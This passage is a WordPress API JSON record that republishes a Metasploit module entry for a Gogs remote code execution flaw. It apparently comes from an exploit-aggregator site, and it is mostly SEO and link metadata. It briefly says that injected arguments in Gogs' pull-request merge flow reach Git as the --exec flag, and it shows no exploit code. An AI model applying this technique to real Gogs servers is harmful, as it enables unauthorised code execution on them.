end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/gogs_rebase_rce.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/gogs_rebase_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-03T19:33:07″,”description”:”This module exploits an argument injection vulnerability in the pull request merge flow of Gogs is parsed by Git as the –exec flag rather than…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-59556","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nGogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=59556\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-03T19:33:07″,”description”:”This module exploits an argument injection vulnerability in the pull request merge flow of Gogs is parsed by Git as the –exec flag rather than...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=59556\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-03T15:48:48+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"23 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE-\",\"datePublished\":\"2026-06-03T15:48:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556\"},\"wordCount\":4475,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59556#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556\",\"name\":\"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-03T15:48:48+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59556\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59556#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=59556","og_locale":"en_US","og_type":"article","og_title":"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE- zero redgem","og_description":"{“lastseen”:”2026-06-03T19:33:07″,”description”:”This module exploits an argument injection vulnerability in the pull request merge flow of Gogs is parsed by Git as the –exec flag rather than...","og_url":"https:\/\/zero.redgem.net\/?p=59556","og_site_name":"zero redgem","article_published_time":"2026-06-03T15:48:48+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"23 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=59556#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=59556"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE-","datePublished":"2026-06-03T15:48:48+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=59556"},"wordCount":4475,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=59556#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=59556","url":"https:\/\/zero.redgem.net\/?p=59556","name":"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-03T15:48:48+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=59556#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=59556"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=59556#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Gogs Git Rebase Argument Injection RCE_MSF:EXPLOIT-MULTI-HTTP-GOGS_REBASE_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59556","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=59556"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59556\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=59556"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=59556"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=59556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}